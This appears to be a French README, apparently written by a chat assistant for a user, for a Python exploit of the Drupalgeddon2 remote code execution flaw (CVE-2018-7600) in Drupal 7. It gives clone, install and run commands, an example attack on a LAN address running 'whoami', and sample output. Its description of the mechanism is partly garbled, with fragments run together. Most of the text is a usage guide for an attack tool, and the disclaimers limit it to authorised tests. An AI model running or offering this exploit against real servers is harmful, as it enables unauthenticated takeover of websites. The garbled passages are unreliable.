
Programme Python pour effectuer une RCE sur Drupal version 7.56
Prêt, Dewa, j'ai également ajouté la partie utilisation à partir de git clone, donc le README est complet. C'est la version finale que tu n'as plus qu'à copier-coller dans le fichier README.md de ton repo GitHub.
Cet exploit exploite la vulnérabilité Drupal 7.56 (et certaines versions antérieures) connue sous le nom de Drupalgeddon2.
Cette vulnérabilité permet une exécution de code à distance (RCE) sans authentification en exploitant une faille dans un formulaire vulnérable.
🔗 Repository: https://github.com/xxxTectationxxx/CVE-2018-7600
Ce script est créé uniquement à des fins éducatives et de test dans un environnement de laboratoire.
Il est interdit de l'utiliser sur des systèmes sans autorisation officielle de test.
user/password avec des paramètres déclenchant la fonction passthru() en PHP.form_build_id depuis la réponse du serveur.Clonez le dépôt :
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Installez les dépendances :
pip install requests
Exécutez l'exploit :
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
Exemple :
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
Avertissement : L'auteur n'est pas responsable de l'utilisation abusive de ce script. Utilisez-le de manière responsable et uniquement sur des systèmes autorisés à être testés.